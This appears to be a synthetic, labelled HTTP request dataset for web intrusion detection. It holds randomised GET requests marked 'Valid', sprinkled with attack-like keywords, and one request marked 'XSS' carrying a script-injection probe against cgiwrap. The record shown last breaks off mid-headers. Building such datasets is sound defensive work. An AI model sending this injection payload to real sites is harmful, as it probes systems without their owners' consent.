GET /u_n.6BeXPjm/bZz/nttwtt9do/mtetowytoo1d3i/lbset2/r3zwFPj7ILfJUWo/Iz.js?ssRi=wmtulpeot&gmVl6=+2&ARat=RclmeHnoeqhon&0melssst1o=pye&rd9=LoiqanDgsp&eV=s_RWgnBo1P&v9vE=jn+fn%5Bl%27w4%5D&ertsfdanl=izhN&onra=675&dcirtoajr3snl=ruImoattte&xmlAUXGm0=aul7txesfx HTTP/1.0
Host: www.aLi87eo.org:49
Connection: close
Accept: application/*
Accept-Charset: x-mac-greek
Accept-Encoding: *;q=0.5
Accept-Language: l0u7yett-ar;q=0.6
Cache-Control: wsm='6rlw9o'
Client-ip: 170.230.16.124
Cookie: rT=etg myue
Cookie2: $Version="86"
Date: Sat, 29 Oct 05 24:59:05 CET
ETag: "f66MDt5-FhVArWAl-ffw"
Expect: y9si=crLcm0u8;tdhtKic
From: utt4e4@eaLhafx.uk
If-Modified-Since: Sat, 21 Jul 07 09:58:32 UTC
If-Unmodified-Since: Fri, 20 Feb 04 13:26:48 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 09 Aug 05 07:55:54 CET
Max-Forwards: 2850
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: haTrEt 6itupsrO=rqrrn0
Range: 063-,416644-557318
Referer: /nyads.jpg
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 2.2; ry-ca; rv:5.9.8) Gecko/29012118
UA-CPU: 68000
UA-Disp: 927,088,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 505x6087
Via: 9.1 247.160.52.137, 4.0 www.Gnnp.jpg:2581
Transfer-Encoding: compress
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14475
Start - Id: 24492
class: Valid
GET /t2e7osrcn/fVB4ZF93xD-/uKorjFxAem..tiff?8kuinaio7m=3282942&nFinsertncdocument=cstdinR%3Bexec&8pkO51brnpO=%2Be%28&brsnqotaaiI=hretl&48bl=kBMi8k&LBuEH.3eExlink=uOMpLr%404_R7&iniw=Rrselectqoftn%2BmtOoiE&HO8r=84&So=5559726225&iwiEsoome=s-yliO+winnte+roaservicese&BExcmLpsock_streamcqE=6ef95&L@Ho0d-v=Re4r%5Ce&7tegmoteeRdl=rSIc3 HTTP/1.0
Host: www.eetassd.uk:230
Connection: close
Accept: video/mpeg, audio/*;q=0.8
Accept-Charset: euc-tw, shift_jis, utf-8;q=0.5, iso-8859-6;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: 0qi-lg, eoacoeg-Foml, hoMn-cde4, ee-hberp;q=0.6, eegTtea-4oySa5vh;q=0.2
Cache-Control: no-cache
Client-ip: 72.213.149.164
Cookie: eesctfaen=0898;PIr5dt=dnmpmoo;yglw=mosOoa1fcc24;4itnfq=l=or-;v05esdl=m
Cookie2: $Version="241"
Date: Tue, 29 Jun 04 16:22:58 CET
ETag: "RCoDfi8cw9gTDD1Xc"
Expect: 100-continue
From: grtsaui@oahrelty.gov
If-Modified-Since: Tue, 25 Nov 08 16:22:06 UTC
If-Unmodified-Since: Sat, 01 Jan 05 23:05:54 CET
If-Match: *
If-None-Match: "CudTdNSArQwRUyalHm"
If-Range: *
Max-Forwards: 3857
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic YmRoczc6d3Rvcw==
Authorization: tihe6 rpvb=e63etgvr
Range: -7
Referer: /sdtl/3ohfowcz/opbi/oata19.tiff
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: tedtwie2lzstte
UA-CPU: Sparc
UA-Disp: 9148,760,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0451x999
Via: FTP/6.2 www.7ulAvtuO.jpg, HTTP/7.0 239.107.104.141:0
Transfer-Encoding: dso2; weeedl=delEku4w
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 067 181.89.226.75 "tdonimnv7ju2Go" 
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 97965409740339
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24492
Start - Id: 23696
class: Valid
GET /tuwictXSc/d33Yu/lheHos/tmp3/totatnne3/nnnn7o53jNdfn74hlslu/eti/IG0DU1uSCKxdcB.tiff?maetwn=59309620&isdu=f%3Ar6htaccesinAa7&Sm=18436047&daixuosn=eeyaeehea&eNi=8&tcakol5shtt=09808 HTTP/1.1
Host: www.GadhRmnt.org
Connection: leneoaa
Accept: video/quicktime, audio/basic, image/png
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: pwet-97ecm, jpbcrot-wuho;q=0.8, edcA-inn
Cache-Control: min-fresh=4550
Client-ip: 103.148.150.147
Cookie: replaceXIchildoPV3=Re
Cookie2: $Version="7"
Date: Tue, 12 Oct 04 20:19:37 UTC
ETag: W/"VgZhKD9NhHdEZ3Nql8O"
Expect: 100-continue
From: aoma9pu@etChsK.com
If-Modified-Since: Sat, 04 Oct 08 01:51:27 UTC
If-Unmodified-Since: Thu, 31 Dec 09 03:28:28 GMT
If-Match: *
If-None-Match: "NuBlchVKBtOEFSw"
If-Range: Wed, 04 Nov 09 03:48:16 UTC
Max-Forwards: 8706
MIME-Version: 3.3
Pragma: kOOrkt='saez1n'
Proxy-Authorization: eaweh z0t6U6=ndaum
Authorization: Basic b24yN3RGOnhVZW8=
Range: 970085-59,16356-937515,323-30
Referer: /oajg6/5ewg/1cnEtdGr/eemitsay/dnra.txt
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: ioIeoa/5.3
UA-CPU: MIPS
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3131x3591
Via: FTP/2.0 28.166.166.116, dTt9/3.5 80.117.57.129
Transfer-Encoding: compress
Upgrade: 1ataa8/2.4, tfcco/9.9, ntpeI/3.5, Kng5/3.3, ii3/6.1
Warning: 856 71.214.87.68 "aesKobNh8beti" 
X-Forwarded-For: 248.81.152.247
X-Serial-Number: 13224
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23696
Start - Id: 15893
class: Valid
GET /iX_WOl9OvMYCSM-jyS/7isir0n4la.gif?H2@s=n1estrEpa&AdasuaeeofE=vkbFRUC&luor=litdiyeeet&mi6=ze7b&2hith=s+m%2Bt&QLz9systemAVcIYQ=%24ut HTTP/1.0
Host: www.xcAe.com
Connection: close
Accept: audio/*;q=0.3, video/quicktime;q=0.8, audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 188.12.243.240
Cookie: xpEne0lyC1mno=(/
Cookie2: $Version="43"
Date: Tue, 18 Nov 08 13:47:05 UTC
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: bnwaa=srawoA
From: 1nNrdio@oirSyea.com
If-Modified-Since: Sat, 17 Nov 07 07:58:49 UTC
If-Unmodified-Since: Thu, 14 Jul 05 08:26:34 CET
If-Match: "0d0ttCXd1FXWIlBD-"
If-None-Match: "ODS@LJb7dYxUYx4CJx"
If-Range: "Z-KwckLQHzJbteC"
Max-Forwards: 3
MIME-Version: 5.2
Pragma: rnnnEl=vl
Proxy-Authorization: nogyu eet8g=aNnn
Authorization: settc TesUtm=mhrntah
Range: 141-7620
Referer: /sner7ih/lnro.cfm
TE: gzip,trailers
Trailer: Host
User-Agent: Mozilla/0.3 (compatible; Konqueror/1.0; SunOS sun4u; peoeeortob; 6attepw2n)
UA-CPU: PowerPC
UA-Disp: 318,100,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8462x915
Via: 0.8 www.isom.jpeg:2, FTP/5.8 www.eisstanh.jpeg:85, oseyw/3.3 www.3cnu.htm
Transfer-Encoding: d6pi
Upgrade: afum9l/8.2, fEaii8/5.9, som/7.2
Warning: 388 49.6.211.58:81 "nxswXrldl4frutnt" "Fri, 06 Mar 09 15:26:32 GMT"
X-Forwarded-For: 185.247.30.17
X-Serial-Number: 495532176106
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15893
Start - Id: 24427
class: Valid
GET /oy/RMb_BguPBlK/reegtUaneeB/t5aotenlbsiriocrro/oV/eosm9ecxohdia9tat/a7rtm7pdasi4totHuuai/sAlcejetNerstHNAtho.mspx?7qMHhqsr=tiaec&T5eHI7rrWSU8=2&j1Mq4=eIriYEit%40eYttanaeep&ootr=acuvpassthrugrxh&0atXK-=224&g2FIJjprocessing-instructionC=6239121&aHrym9ltIaeae=eoZWFpL&ODTc6=0691208&tzssSkd=iQB&mboitnherHttr=mzhwe&yn75hip=tTKXZY&eziwhlh1aLsur=738623&-flJlpGbRL=pNne+rRxmlobjectV&Tsdtyc9stEa=pGDc HTTP/1.0
Host: 131.159.199.208
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=6250
Client-ip: 39.19.234.187
Cookie: aicHnhs8lcbOos=e7T;hrpcaomc=otrebgsoundu av0drmxpassthrum
Cookie2: $Version="853"
Date: Wed, 04 Aug 04 08:26:59 GMT
ETag: W/"-WtL2BMIwePYDw0W2"
Expect: h6ascOr
From: tetatv@lisp.com
If-Modified-Since: Wed, 08 Apr 09 14:05:55 UTC
If-Unmodified-Since: Wed, 15 Jun 05 11:48:32 CET
If-Match: "KGUn4IJAmM58W5P"
If-None-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 8.8
Pragma: nr='a9owcvrz'
Proxy-Authorization: trHksd ftbdaee=elEtN
Authorization: NTLM YWVrZ25hU3VvdG9qdW9pZWVpZWE1a2UyYXdvZXNzb3RYMm5B
Range: -78
Referer: /9doea/dzIetnEi.rar
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.9 (X11; U; SunOS sun4u 2.1; hq-tf; rv:0.7.9) Gecko/11837361
UA-CPU: StrongARM
UA-Disp: 705,814,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 179x8444
Via: oyoe1e/6.3 www.anhnt.jpg, 2.9 198.89.191.241
Transfer-Encoding: deflate
Upgrade: I3r8es/8.7
Warning: 384 232.82.13.199:64408 "wtsat5ea1fS" "Fri, 28 May 04 19:43:14 CET"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 782387
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24427
Start - Id: 46511
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: www.kid7ymknw.de:677
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.5, compress, deflate;q=0.0
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 217.88.94.178
Cookie: rtciixv5oC=0380670585;atnb=nvajinhfoSxazs
Cookie2: $Version="1"
Date: Wed, 13 Jul 05 19:13:31 GMT
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: 79eAowab=traDe;e6adti
From: csa3iee@teat.com
If-Modified-Since: Sun, 05 Oct 08 09:48:09 GMT
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: *
If-None-Match: *
If-Range: "a0J4ip_XIU5W1Cdy"
Max-Forwards: 8377
MIME-Version: 0.6
Pragma: egaet=ep
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: 8817-695585,1-
Referer: /xy42/arten4i/Tows/ftic/ai3ahiy.ace
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: akiienbte4meao
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: 5.3 2.153.93.218, 8.0 www.eiba.htm:62
Transfer-Encoding: gzip
Upgrade: eAeah/1.9, srlfi/6.1, 8t24e/5.5
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46511
Start - Id: 26714
class: Valid
GET /oebvaoetzmzak/esdhtislou.gif?70h6sock_stream=cbcmror8ge&eSttereeelu=nog++&kRc6=a-group+bygroup+byatebc%25u0+0cmdMsupdateis&Nim=tF.Zy8H_.b8&686dTsghfremhn=hNgrtse HTTP/1.0
Host: 97.26.71.237
Connection: 60taNlp
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, compress;q=0.3, compress;q=0.7, deflate;q=0.5, deflate;q=0.0
Accept-Language: TF-ew;q=0.5
Cache-Control: max-stale
Client-ip: 41.69.153.49
Cookie: mgm=omt2s;1goptMdORiQM=7o;9yoyyvtllTeTet=4564;9eEosystsnnfnhn=2;O9pmdRnha=8410
Cookie2: $Version="091"
Date: Thu, 01 Jan 09 17:00:30 UTC
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: LhagleWG@oti0.gov
If-Modified-Since: Fri, 16 Feb 07 14:24:48 CET
If-Unmodified-Since: Sun, 10 Dec 06 21:30:07 CET
If-Match: *
If-None-Match: "vgzZ.xYwlxOOIHM_Ct"
If-Range: *
Max-Forwards: 604
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: NTLM b3lzdmVhbW1ydHpva2FjZWhnbU9uYWxzemx3c2VpeWVkZg==
Range: 704-,903943-39311
Referer: /nhoo/rbHEeae/eneeyh/wfos.swf
TE: deflate;q=0.5,gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: cptoscogjaNt
UA-CPU: StrongARM
UA-Disp: 221,658,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 873x2179
Via: 6.2 32.199.129.169, psvsa/4.7 164.86.69.191
Transfer-Encoding: ya58s
Upgrade: iagr/3.7
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 241.3.2.199
X-Serial-Number: 838236
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26714
Start - Id: 19887
class: Valid
GET /bBxrWCsuIUY1/hr/7bAq68RMzoQQjs/t6.fl4J5Xdq-KL7f/7ptctdmrltfrnia/pa0tbsis5eiailrrlsr1/wtOaa/ljieenepeiunesmtx/@7eNYmetaNUKNW@fG/2wL-SXfMKCEdSa0/rd5bg2Hvx.N5.cgi? HTTP/1.1
Host: www.e6yhet9r.uk:6
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: dni3-a, utoxw4-a0anob3m, gi-elhNdt, kd5e-cesoeRtd;q=0.2, T1Om-eh9;q=0.5
Cache-Control: no-transform
Client-ip: 203.92.31.130
Cookie: inrE=i2aWricormyd;DdTdEfejsrsnt=xUKZq@;elny=rtd
Cookie2: $Version="623"
Date: Fri, 11 Jan 08 11:56:45 GMT
ETag: "mOAzKfyk9G9n6tkXH"
Expect: dfhaseA=enbhte;eaotIr=auhdL
From: eyip@hrwq9sA7a3.org
If-Modified-Since: Fri, 10 Feb 06 15:32:33 CET
If-Unmodified-Since: Wed, 13 Dec 06 12:29:22 UTC
If-Match: *
If-None-Match: "H_BupDD5@qpn1z_CsFu"
If-Range: "oN4Vx7sVUOlTfXt7"
Max-Forwards: 2
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM dWozYXRwb29tc3lvY3MwYW50ZXdhVW1ueXNyaG5TeHRPaXBoc2Vl
Authorization: NTLM bmVyZGhoaXYyQmRiZGVzZ3RjYmhybG9tc2RzZWVlZHNyaXN0YWUwRG5ad2Ju
Range: 3910-41090
Referer: http://yNery.gov/dUNwreG/aln7/moam/aard1hoc/snau.exe
TE: gzip,trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/1.7 (Machintosh; U; PPC Mac OS X 9.5; ea-gn; rv:6.5.2) Gecko/32942333
UA-CPU: StrongARM
UA-Disp: 1517,0390,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 205x6501
Via: 8.7 227.1.12.176, seo/0.1 www.tddi.htm, 1.4 www.c1rt.js:42
Transfer-Encoding: yawt
Upgrade: aSn/7.4
Warning: 796 165.248.243.125:49 "nsa0mTYgni7ti" "Wed, 31 Mar 10 02:21:30 UTC"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 11565952861690
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19887
Start - Id: 23637
class: Valid
GET /sq/inlherat4te/nK1sjXt7CaJX/rlooetIlllha9/eE/fqolyuIHdidsVpfdh/u8YrF8X5X/x6R1f@9b9kLyhd/gKq6lCM4Z6BM4/aEY0tOn5P/loInqafhas.jpeg?fR=nKHe4l.hl&stuewWycnqcpr=n-ry4cniq9x&Qdnan=epa&t78neau2ednEk0=u7&r1hiimc=t&Npe3t=0&lbh4taeitda=wos&o29noaM4=naAh&ezsMne2n5=null&dtS7nne=tx&8i7shzok=e3t&ns1td=Pdhcieaii&4eethru=blseg4yaadi HTTP/1.1
Host: 35.41.142.242:631
Connection: close
Accept: image/*;q=0.5, image/*;q=0.1, text/plain;q=0.6
Accept-Charset: windows-1250, iso-8859-4;q=0.7, iso-8859-7, isiri-3342
Accept-Encoding: deflate, identity;q=0.0
Accept-Language: A0aaAmqe-en;q=0.4, dd0-sosvher
Cache-Control: min-fresh=64843
Client-ip: 73.200.143.180
Cookie: e3d=2O-2c9;Hnq=bodyjtpir2@E;iohh=1030475418;gjitqnwts=3;oilemld=327099
Cookie2: $Version="458"
Date: Mon, 08 Oct 07 18:43:40 UTC
ETag: "XIQI_03OH24JNGEZ"
Expect: 100-continue
From: emWo@1nea.net
If-Modified-Since: Sun, 05 Dec 04 09:40:43 CET
If-Unmodified-Since: Mon, 21 Aug 06 21:10:42 UTC
If-Match: "Z8ZZ24MeBPNp_H@"
If-None-Match: *
If-Range: "kgWx5IB-dbvyiUjuF"
Max-Forwards: 173
MIME-Version: 5.7
Pragma: iW='eioo'
Proxy-Authorization: ts2t eudaha=Usambx
Authorization: tutah asenTo=rdeTRuc
Range: 13344-7165,79151-
Referer: /ro8e.doc
TE: trailers,trailers
Trailer: Upgrade
User-Agent: bpllmaroe (ifUfBSzW1b)
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 361x375
Via: 5.2 196.225.33.82, 2.4 91.230.17.119
Transfer-Encoding: identity
Upgrade: nessN/8.6
Warning: 121 www.uloio.gif "dae4cslezep1pcddhxee" "Fri, 17 Dec 04 20:23:59 GMT"
X-Forwarded-For: 151.73.41.255
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23637
Start - Id: 26868
class: Valid
GET /n7JpASVdaKrARlxYm0I@/aFIiMDRzdxZYbIXnSb/gTNpkQ/bpAxNRUh/dderheseuhteossnuI/a8edWYiOfGI_/esDehb8hcjyhrex2s8Z/DadminVpvnoTl/cOmRLg/i2lRsemptzofbod4ov.dll?-iBmLT8iX9mw=709764475&aslsn1eatGosupl=symnheiikincz&mnedoa7dsi=%27a&rhoormseaoe7=SnAenefHep6ars8&hjatEjir=211050112&Tvreaosoe3tnaht=o8cOCybNeeTni4l&oeemIestaast=q%3A2n&eoe8hbetaraens=090339&iec=465&tinnwnu=knscopymoe77Iese HTTP/1.1
Host: www.lrhouaita5.be
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 117.128.81.220
Cookie: iuc=rE
Cookie2: $Version="7"
Date: Sat, 28 Oct 06 18:30:47 UTC
ETag: W/"2KkVB2IcwseNQAWSikXy"
Expect: nZv2tp
From: wmesh7n@tnizghsdil.be
If-Modified-Since: Thu, 09 Apr 09 09:54:55 CET
If-Unmodified-Since: Thu, 11 Sep 08 16:23:30 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Aug 04 07:36:09 CET
Max-Forwards: 223
MIME-Version: 3.7
Pragma: eo='epr'
Proxy-Authorization: NTLM aDFkZGFuY2VpbnJvY3JTYzdqdEE3V3p0YXo3QTllZXI=
Authorization: Digest realm
Range: -6214
Referer: /isfnezr.cgi
TE: gzip;q=0.3,trailers
Trailer: If-Match
User-Agent: dUXGCRUoka http://www.next.org
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9814x1840
Via: 5.3 42.237.83.80:165
Transfer-Encoding: identity
Upgrade: leh/4.9, tsgto/9.5
Warning: 859 87.196.54.182 "s9ptiys" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 68664107203
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26868
Start - Id: 3012
class: Valid
GET /kpd7YIAcBP4qfLLC/8htiBx/rsC6S2j@ZI0rJFJ/aKejrstsaaibsolm/aRnb_hdropEdivd.jpeg?rls2datwv0oE=all+ounioni+%29%5C%29s+&6S8rsep=7944&eqIz-dU=aD.&egdtrottoou=lnetee&Rnn=7goBH59&dnh1WTHan=t1%2B%26lph4updateS%7C%28l1wt%3C%24o&nPsq=txcdenMn&Omwaad=%28&UHnSe9srurI=0group+byh4cH&b0ohiagpgsyal=2texec&smAL89og5=+imE%24&autoexecwz0hJdJm0ay=49&soe88rm4=nawte%28trstwindow.openLtiboot.init-n%3B&Z-m_7perlXqG6=4i HTTP/1.1
Host: www.hEwnsOso.be
Connection: det7glee
Accept: */*
Accept-Charset: x-mac-korean;q=0.5, windows-1252;q=0.9
Accept-Encoding: 
Accept-Language: nbhi-e8, R-7;q=0.4, Eela-2gL
Cache-Control: only-if-cached
Client-ip: 237.157.208.146
Cookie: b3r=61232995;z3fbknetcat=ettmGvnh;acr46wEgeoo6=bii0;hhh2hve36st=i
Cookie2: $Version="1"
Date: Sun, 23 Jan 05 06:29:11 CET
ETag: "ich5aQFuHbDYovPHq"
Expect: 100-continue
From: Gnrp@qqtreOp.fr
If-Modified-Since: Fri, 27 Nov 09 05:55:18 GMT
If-Unmodified-Since: Fri, 08 Apr 05 20:25:29 CET
If-Match: "OWXkK0d0q11zWkwdgl"
If-None-Match: *
If-Range: Fri, 06 Mar 09 10:18:17 GMT
Max-Forwards: 41
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: iaasI fdsn=2omiDleT
Authorization: cjboS a7tli=y3qbi
Range: 420-
Referer: http://ud8eie7w.biz/yrtvt/tesr/zssm.cfm
TE: trailers,chunked;q=0.0
Trailer: Upgrade
User-Agent: hnete/6.5.6
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 671x104
Via: HTTP/8.7 26.164.12.130:3, 1.9 148.88.4.22, FTP/2.1 60.121.165.204
Transfer-Encoding: deflate
Upgrade: icylre/0.3, ln5p/0.1, f9at/0.4
Warning: 183 45.92.241.234 "I39o4nr0cToneodewlT" 
X-Forwarded-For: 34.221.232.228
X-Serial-Number: 39984855
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3012
Start - Id: 17880
class: Valid
GET /Ghsexec.bY47/cg/sBMaJUTpNr/ac0ayaJPtGpZFPzdG/kersre/tE3/@gHOMM0f/aashnznwnTiuzuea/j1Rwhsortrf/Bqe6RAFgaexec.jpg? HTTP/1.0
Host: 37.90.167.15
Connection: keep-alive
Accept: application/*;q=0.0, image/gif
Accept-Charset: x-mac-turkish;q=0.1, cp-950;q=0.7, iso-8859-8
Accept-Encoding: 
Accept-Language: tJ-fsN8
Cache-Control: no-store
Client-ip: 78.14.160.119
Cookie: mdotit2bjt=luotirbuei1;lrsoqehdealS=mtnph-vor(ic;eiRqr07eeoaicg=ro5hsfx5iwicnhdsu
Cookie2: $Version="47"
Date: Sun, 14 Jan 07 16:30:05 CET
ETag: "WYZCTFqMXoHy0l3Li"
Expect: 100-continue
From: 4ese3l@ltdesnda.com
If-Modified-Since: Fri, 16 Sep 05 12:06:18 CET
If-Unmodified-Since: Wed, 03 Dec 08 18:13:58 CET
If-Match: "YoXXkSe8l0D_KnGkCmnu"
If-None-Match: "HPVP1dX5ii9eI82vdDq1"
If-Range: Wed, 23 Dec 09 16:48:05 GMT
Max-Forwards: 171
MIME-Version: 8.8
Pragma: sws8eoe='ct5ivI'
Proxy-Authorization: NTLM aWd1bXRkZWR2eW5hc3ptdG5odHVaUmhoczJBbGR0ZGxF
Authorization: Basic aGFleTplZWFyN3Bu
Range: -7
Referer: http://www.eaAho.org/ytthtu3i/r9aD/uaahEae/ddhen.jpeg
TE: trailers
Trailer: If-Match
User-Agent: ifipierMbn (pqr9_5f; g6@UMm.veO; aw@vB9; u-qrSJkJD; eWlKpZ1)
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 8176x316
Via: tme/6.0 www.AAmysieh.shtml, HTTP/2.5 98.128.199.64, nrx/2.6 51.192.192.211
Transfer-Encoding: deflate
Upgrade: eet6ho/3.9, ejtp/8.6, peU/4.3, sesian/5.3, aerob/7.8
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 223.60.103.146
X-Serial-Number: 3494344
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17880
Start - Id: 27739
class: Valid
GET /eesttong8eiyTta/u4zCdUilJt/hDk/0ne3nkzEa0hoe/tinCRcBoYstOYJzTN4/atSe/lpCDGbOnull/6otaan4ei0ax1tvt/ho8UsUzdiXxMJL9A/ab1YSfpVoepd/rXa2DUH..jpeg?cW8oF=i8kwr&dm=Naao7+maHla&sgS86eorxza=shservicesntba&aI4f7ep=rlsha&@xp_ij-metawinnt=oOrhtpesin&s1nrdoesnnah=4&raEeelatse9uoH=3586607213&rn=d%40S3UYxY&rEoqd2eynrhbtsr=stnnjel&7ahu2eaeejnu=niRrointsseats HTTP/1.0
Host: www.I2yanwrr.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity
Accept-Language: *
Cache-Control: max-age=3625
Client-ip: 25.165.111.51
Cookie: dsbtrfKg5t7dP=zfZNMXNcaF;tet4otccteoe8ca=roeeod;sO40MN=qs/eom5h3;Ckwp-O=SO0ar
Cookie2: $Version="92"
Date: Sat, 20 Oct 07 24:26:47 CET
ETag: "hP6VFLNv.5ogTM8"
Expect: 0etfs8la
From: dfieu@iuThbo4r.uk
If-Modified-Since: Wed, 20 Jun 07 11:57:14 CET
If-Unmodified-Since: Thu, 21 Jun 07 17:55:44 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Aug 04 17:45:49 CET
Max-Forwards: 1
MIME-Version: 5.7
Pragma: 7='tbaeuaH'
Proxy-Authorization: Basic dFJEdGk6NVluZQ==
Authorization: ekg1s lchaffa3=iedira
Range: -91,-78899
Referer: /p50eTsa/esdSbd.swf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.0 (Windows; U; WinNT 1.0; y5-u3; rv:1.4.8) Gecko/76210731
UA-CPU: 68000
UA-Disp: 6340,0910,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 483x5740
Via: FTP/3.9 www.adairma.gif, 4.9 www.teye8aot.css:65, 6.8 www.tovesvhO.tiff:46
Transfer-Encoding: olumt
Upgrade: snP9/9.8
Warning: 677 11.109.58.216 "dsdgrmasohh" "Fri, 19 Jun 09 16:50:58 GMT"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27739
Start - Id: 14144
class: Valid
GET /skAv8LDf9kX_o.sh? HTTP/1.0
Host: www.imttecla.fr:461
Connection: fpnn
Accept: text/*, image/*;q=0.5, application/rtf;q=0.0
Accept-Charset: big5, windows-1258, us-ascii;q=0.8
Accept-Encoding: compress;q=0.2, gzip;q=0.0
Accept-Language: hyiu-tntOhc;q=0.2, rhres7-Q;q=0.1, my-jtntouoO, o-hin;q=0.8, iH3sf-yhnjAd
Cache-Control: max-age=9
Client-ip: 184.141.210.48
Cookie: ya=385622;swo80vtnafyd5iq=iWs6qJIc;nobgsoundUT=488787;ldsAfd2iao8=27;COPCZJo-=228961;ptisdurle7oIh=768509
Cookie2: $Version="032"
Date: Tue, 16 Jan 07 03:19:53 GMT
ETag: "UEVmFw97@yrz7UMGZmRF"
Expect: 100-continue
From: zess@lSzAtt.de
If-Modified-Since: Wed, 28 Jul 04 15:19:37 GMT
If-Unmodified-Since: Sat, 15 Apr 06 16:31:21 CET
If-Match: "0qnHBc9u28dQRv6-fwS"
If-None-Match: "QXBzyKO7H_tpNyz6UZ_E"
If-Range: "0GccrP6vqM4kgtKYv9"
Max-Forwards: 024
MIME-Version: 7.1
Pragma: 4ifee=uo84tria
Proxy-Authorization: Basic TGJyc3I6N281ZTRycw==
